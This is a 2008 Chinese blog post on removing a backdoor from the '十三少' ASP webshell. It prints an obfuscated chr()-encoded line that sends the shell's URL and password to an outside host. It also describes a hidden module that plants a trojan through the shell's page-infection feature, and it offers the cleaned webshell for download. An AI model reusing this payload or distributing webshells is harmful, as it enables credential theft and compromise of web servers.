首页 > 网络安全 > 十三少网马去后门

十三少网马去后门

2008年9月18日 发表评论 阅读评论

  今天那个salors要我丢他一个webshell,本来我这有好几个,准备给他13的,一看还有后门,这个东东俺以前没用过,他说要就帮他去一下后门,没有技术性,不过他Y的非要我写出来步骤,我就写一下吧。一会儿也将去后门的上传上来,供大家使用,如果下载后还有后门,告诉我一下,有时眼不好使。。。
  既然是后门,他一定会将url和pass保存下来,get到一个可以接收参数的页面去,所以,第一步要想的就是寻找user,pass。
  好了,我们现在寻找那段保存pass的代码,如图:

这段就是保存的pass变量,他接收时一定会用到这个变量,所以我们查找这个变量:
居然没找到!呵呵。一定还有另一段加密的代码,从上往下翻,到163行,有如下代码:

<br />copyurl=chr(60)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(32)&chr(115)&chr(114)&chr(99)&chr(61)&chr(39)&chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(56)&chr(99)&chr(99)&chr(101)&chr(46)&chr(99)&chr(110)&chr(47)&chr(97)&chr(100)&chr(47)&chr(63)&chr(97)&chr(100)&chr(61)&chr(49)&chr(51)&chr(38)&chr(117)&chr(61)&serveru&chr(38)&chr(112)&chr(61)&serverp&chr(39)&chr(62)&chr(60)&chr(47)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(62)&chr(13)&chr(10)

解密后就是:

然后我们将这个copyurl改成其他的,或者是搜索copyurl模块再个性,将其去掉。因为我这没带后门的马了。刚改过。

这样就把马去掉了。但是后来正准备给salors这个shell,但又发现一处,呵呵。。

搜索plgm,到312行,可以看到和copyurl一样的加密的,利用同样的方法,可以改掉了。。然后到plgm的执行模块,去掉相应的执行命令。这个地方主要是利用你挂马功能,将他的马也挂上了。。阴!!

就这样了。其他的不明白的,可以留言问。

记得以前在哪看过去十三少webshell的文章,但是忘记了,不过那种方法和这个加密不太一样,如果觉得我侵权了,说一下,不过为了学习技术嘛。。呵呵。

顺便把去后门的大马传上来!老的看着不爽。对CSS进行了修改。。呵呵

下载:down

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:十三少网马去后门
本文地址:http://www.woyigui.cn/2008/09/18/13-webshell-To-the-back-door/

分类: 网络安全 标签:
  1. salors
    2008年9月18日13:32 | #1

    – -!
    神话都没上….

    [回复]

  1. 本文目前尚无任何 trackbacks 和 pingbacks.
*